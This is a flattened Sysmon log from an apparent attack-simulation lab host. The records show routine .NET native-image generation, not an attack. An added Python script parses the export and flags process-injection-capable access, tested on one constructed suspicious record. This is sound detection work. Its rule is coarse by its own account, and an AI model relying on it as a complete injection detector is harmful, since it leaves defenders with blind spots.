21:06:52.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1A05-00000000CF01}6352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.311{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1A05-00000000CF01}6352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.311{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1A05-00000000CF01}6352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.311{4DB9351A-A26C-60D3-1905-00000000CF01}6544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8GA5IPXY59\CustomMarshalers.ni.dll.auxMD5=3EC9F98A25D806CC49EBBEC3771F1CFA,SHA256=9BF86FCB8670A3F1F6A00C8E19298F6221B3DF94E51050C7B185EA664A26E974,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.311{4DB9351A-A26C-60D3-1905-00000000CF01}6544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8GA5IPXY59\CustomMarshalers.ni.dllMD5=A542743061673FED6CA63E04366BD183,SHA256=527615162A5BD9E7A3E78E0F7567478B00D1AE33E9085C2FA10F4C4659ABBA00,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.280{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1905-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.265{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1905-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.265{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1905-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.249{4DB9351A-A26C-60D3-1805-00000000CF01}5828NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JO3N82PQTY\System.Web.Services.ni.dll.auxMD5=914EB68BCAC967CB8DD7591EF4BEC9BB,SHA256=EDE554E244C8916871C0FE90AB00662E27C994FAC349BDE1C9BD388D607BFCBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.249{4DB9351A-A26C-60D3-1805-00000000CF01}5828NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JO3N82PQTY\System.Web.Services.ni.dllMD5=874FF562C1018A88838F4FE21D534C1E,SHA256=75168520F20010B9B010207164BFF0B1338CE4325578642E3EDEF4C086020CD6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.124{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1805-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.108{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1805-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.108{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1805-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.093{4DB9351A-A26C-60D3-1705-00000000CF01}2228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C0RHHG0FS8\System.Transactions.ni.dll.auxMD5=2EB1DDA39AAE496E32D8CFF25B83C617,SHA256=6FDB374475BC9313FFE1B683DD8BF9110BCFF28E972A392350C939F0F83A0813,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.093{4DB9351A-A26C-60D3-1705-00000000CF01}2228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C0RHHG0FS8\System.Transactions.ni.dllMD5=983BEA46B19A36052C5CB631D5E50DA3,SHA256=194F96344E6DBE13AD4A7564CE9786B61C809058EC6F33EC6595738F67C51CAD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.030{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1705-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
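The records above repeat one shape: for every new mscorsvw.exe worker, csrss.exe and ngen.exe open it with GrantedAccess 0x1fffff (PROCESS_ALL_ACCESS), the RPCSS svchost.exe opens it with 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION), and the worker then deletes its temporary .ni.dll and .aux files. The following is an added example, not part of this page's data set, that parses the flattened export back into fields and runs a first-pass triage rule over it. Its reading of the format (the System fields run together, RuleName always "-", one space between records, SourceProcessId and SourceThreadId joined without a separator) is inferred from the page; the sample mixes three records copied from the page with one constructed record (EventRecordID 99001, update.exe, an UNKNOWN frame) that does not occur on the page. Field names are Sysmon's own; the access-mask constants, the rule and the function names are the example's.

```python
"""Parse the flattened Sysmon export on this page and triage its ProcessAccess events.

Added example. Format assumptions, inferred from the page and not documented anywhere:
a record is the <System> fields run together (EventID Version Level Task Opcode Keywords
EventRecordID Channel Computer) followed by the EventData values in schema order with
RuleName ("-" throughout) first; records are separated by one space; SourceProcessId
and SourceThreadId are concatenated, so their boundary is lost.
"""
import re

GUID = r"\{[0-9A-Fa-f-]+\}"
HEADER = re.compile(
    r"(?P<eid>\d+)(?P<version>\d)(?P<level>\d)(?P=eid)(?P<opcode>\d)"   # Task == EventID in Sysmon
    r"(?P<keywords>0x[0-9A-Fa-f]{16})(?P<record_id>\d+)"
    r"Microsoft-Windows-Sysmon/Operational(?P<computer>.+?)-"            # the '-' is the empty RuleName
    r"(?P<utc>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})")
# Event ID 10 body. GrantedAccess is lowercase hex, so the class stops at the 'C' of the
# first CallTrace frame; the lookahead also copes with a lowercase drive letter there.
ACCESS_BODY = re.compile(
    rf"(?P<src_guid>{GUID})(?P<src_pid_tid>\d+)(?P<src_image>.+?)"
    rf"(?P<tgt_guid>{GUID})(?P<tgt_pid>\d+)(?P<tgt_image>.+?)"
    r"(?P<access>0x[0-9a-f]+)(?=[A-Za-z]:\\|UNKNOWN|$)(?P<trace>.*)$", re.S)
# Event ID 23 body: ProcessGuid ProcessId User Image TargetFilename Hashes IsExecutable Archived
DELETE_BODY = re.compile(
    rf"(?P<guid>{GUID})(?P<pid>\d+)(?P<user>.+?)(?P<image>[A-Za-z]:\\.+?\.exe)"
    r"(?P<target>[A-Za-z]:\\.+?)MD5=(?P<md5>[0-9A-F]{32}),SHA256=(?P<sha256>[0-9A-F]{64}),"
    r"IMPHASH=(?P<imphash>[0-9A-F]+)(?P<is_executable>true|false)(?P<archived>true|false)$")

PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_WRITE = 0x0002, 0x0008, 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE  # enough to inject


def _match(pattern, text):
    m = pattern.match(text)
    if not m:
        raise ValueError("unparsed record fragment: " + text[:60])
    return m


def split_records(text):
    """Cut a flattened line into records at every <System> header."""
    starts = [m.start() for m in HEADER.finditer(text)]
    return [text[a:b].strip() for a, b in zip(starts, starts[1:] + [len(text)])]


def parse_record(rec):
    """Header fields plus the EventData of ProcessAccess (10) and FileDelete (23) records."""
    h = _match(HEADER, rec)
    ev = h.groupdict()
    for k in ("eid", "version", "level", "opcode", "record_id"):
        ev[k] = int(ev[k])
    body = rec[h.end():]
    if ev["eid"] == 10:
        ev.update(_match(ACCESS_BODY, body).groupdict())
        ev["tgt_pid"], ev["access"] = int(ev["tgt_pid"]), int(ev["access"], 16)
        ev["trace"] = ev["trace"].split("|")
    elif ev["eid"] == 23:
        ev.update(_match(DELETE_BODY, body).groupdict())
        ev["pid"] = int(ev["pid"])
        ev["is_executable"], ev["archived"] = ev["is_executable"] == "true", ev["archived"] == "true"
    else:
        ev["body"] = body                                  # other event IDs left unparsed
    return ev


def pid_tid_candidates(joined):
    """Every (pid, tid) split of the joined field. Windows hands out both in multiples of 4,
    so only splits where both parts are multiples of 4 can be real; context picks among them."""
    out = []
    for i in range(1, len(joined)):
        pid, tid = int(joined[:i]), int(joined[i:])
        if joined[i] != "0" and pid % 4 == 0 and tid % 4 == 0:
            out.append((pid, tid))
    return out


def triage_access(ev):
    """Reason a ProcessAccess record deserves a look, or None. The csrss/ngen/svchost opens on
    this page pass: every source lives under C:\\Windows and every frame is module-backed."""
    if ev["eid"] != 10 or not ev["access"] & INJECT_MASK:
        return None
    reasons = []
    if not ev["src_image"].lower().startswith("c:\\windows\\"):
        reasons.append("source outside C:\\Windows")
    if any(frame.startswith("UNKNOWN") for frame in ev["trace"]):  # Sysmon's marker for unbacked code
        reasons.append("unbacked frame in CallTrace")
    return "; ".join(reasons) or None


def flagged(text):
    """EventRecordID -> reason for every record in the flattened text that trips the rule."""
    evs = (parse_record(r) for r in split_records(text))
    return {ev["record_id"]: why for ev in evs if (why := triage_access(ev))}


# Three records copied from this page (EventRecordIDs 22486, 22487, 22488) ...
PAGE_RECORDS = [
    r"10341000x800000000000000022486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.780{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1E05-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f",
    r"10341000x800000000000000022487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1E05-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781",
    r"23542300x800000000000000022488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.905{4DB9351A-A26C-60D3-1E05-00000000CF01}6320NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\K840NGD2KB\System.Runtime.WindowsRuntime.ni.dllMD5=3728FE7D5E46B8174BDF4B0CB3F32D4C,SHA256=6E0AAF51B717224BFF1D1BFE4D2AC9F18E8037FE14C13D68592A3461540ACE53,IMPHASH=00000000000000000000000000000000truetrue",
]
# ... and one CONSTRUCTED record (99001), not from the page: a binary in a user profile
# opening the same worker with PROCESS_ALL_ACCESS from a frame no module backs.
CONSTRUCTED_RECORD = r"10341000x800000000000000099001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.000{00000000-0000-0000-0000-000000000000}61046108C:\Users\bob\AppData\Local\Temp\update.exe{4DB9351A-A26C-60D3-1E05-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|UNKNOWN(000001E3A4B20000)"
SAMPLE = " ".join(PAGE_RECORDS + [CONSTRUCTED_RECORD])

if __name__ == "__main__":
    print(flagged(SAMPLE))
```

The rule is deliberately coarse: a path test on C:\Windows lets anything dropped in a world-writable spot such as C:\Windows\Temp through, so a production version also checks the signer and the parent of the source image and keeps a per-target allowlist (csrss.exe and ngen.exe opening mscorsvw.exe with full access is exactly what .NET native-image generation looks like and should not page anyone). pid_tid_candidates() is there because the export makes the split unrecoverable in general; 53885396 has a single candidate, 412528 has three, and only the shared ProcessGUID across records tells you csrss is PID 412.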
EventID=10 Version=3 Level=4 Task=10 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22448 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 21:06:52.015 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourceProcessId+SourceThreadId=412496 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A26C-60D3-1705-00000000CF01} TargetProcessId=2228 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventID=10 Version=3 Level=4 Task=10 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22447 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 21:06:52.015 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourceProcessId+SourceThreadId=53885396 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A26C-60D3-1705-00000000CF01} TargetProcessId=2228 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
EventID=23 Version=5 Level=4 Task=23 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22446 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 21:06:52.015 ProcessGuid={4DB9351A-A26B-60D3-1605-00000000CF01} ProcessId=2408 User=NT AUTHORITY\SYSTEM Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe TargetFilename=C:\Windows\assembly\temp\EGZR5KHJ2B\System.DirectoryServices.ni.dll.aux Hashes=MD5=552BA52BCA8F39CEBE9473586B8BFCB1,SHA256=89192B22F3E0BEB60BA843A18C8EB37B5F98377166AA26EC74CD308DC7972F0C,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=true
EventID=23 Version=5 Level=4 Task=23 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22445 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 21:06:51.999 ProcessGuid={4DB9351A-A26B-60D3-1605-00000000CF01} ProcessId=2408 User=NT AUTHORITY\SYSTEM Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe TargetFilename=C:\Windows\assembly\temp\EGZR5KHJ2B\System.DirectoryServices.ni.dll Hashes=MD5=E5750590D0AE25606061EF861D7F0A8F,SHA256=C059019E71CBB20405C6FBB68C1A3B055CCB0745030A864163AC76ECCC895E7C,IMPHASH=00000000000000000000000000000000 IsExecutable=true Archived=true
